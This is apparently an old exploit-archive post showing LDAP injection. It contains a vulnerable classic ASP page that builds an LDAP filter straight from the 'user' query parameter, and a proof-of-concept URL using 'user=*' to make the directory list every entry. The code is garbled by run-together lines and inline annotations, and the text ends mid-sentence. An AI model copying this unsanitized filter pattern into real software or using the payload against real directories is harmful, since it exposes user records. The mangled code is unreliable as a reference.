LDAP injection proof of concept exploit.

[+] Vurnerebility:LDAP Injection [+] Category :Implemented Web exploit [+] Category :Attack Technique[+] Author  :mc2_s3lector [+] dork    :X/o/"[+] Contact : www.yogyacarderlink.web.id[+] date :4-2-10[+] biGthank to :Allah SWT,jasakom,KeDai Computerworks,0n3-d4y n3ro,eplaciano, all*.indonesian like a coding,---------------------------------------------------------------------------------------------------------------------------------------------------Directory acces protokol/directory manipulation,protokol breaker->standar protocol,querycustom statement,page request,componen execute command,data base server,web apps servicesmodify,remove etc.---------------------------------------------------------------------------------------------------------------------------------------------------code:<html><head><body><%@ Language=VBScript %><%Dim userNameDim filterDim ldapObjConst LDAP_SERVER = "ldap.example"userName = Request.QueryString("user")<-----------*1(LOOK THIS BUG LINE PARAMETER USER=EMPTY)( userName = "" ) thenResponse.Write("<b>Invalidrequest. Please specify avalid user name</b><br>")Response.End()end iffilter= "(uid=" + CStr(userName) + //((*1))userName used to initialize filter variable on this line direct query LDAP call to finf filter on ((*.3))")" ' searchingfor the user entry'Creat LDAP object and settingthe base dnSet ldapObj =Server.CreateObject("IPWorksASP.LDAP")ldapObj.ServerName = LDAP_SERVERldapObj.DN ="ou=people,dc=spilab,dc=com"'Setting the search filterldapObj.SearchFilter = ((*.3))filter<---call SearchFilter on this lineldapObj.Search'Showing the user ennumeratin infoWhile ldapObj.result = ((1*.4 to *.5))Response.Write("<p>")Write("<b><u>Userinformation for : " +ldapObj.AttrValue(0) + "</u></b><br>")For i = 0 To ldapObj.AttrCount -1Response.Write("<b>" +ldapObj.AttrType(i) +"</b> : " + ldapObj.AttrValue(i) + "<br>" )Response.Write("</p>")Wend ((*.5))%></head></body></html>---------------------------------------------------------------------------------------------------------------------------------------------------control over LDAP to querry =server LDAP & get query result from ((*.4 to *.5))POC:http://server/ldapsearch.asp?user=* <----send the * character in the parameter user,result flter variable in code to be initialized with(uid=*). The resulting LDAP statement will make the server return-------------------------------------------------------------------------------------------------------------------------------------------------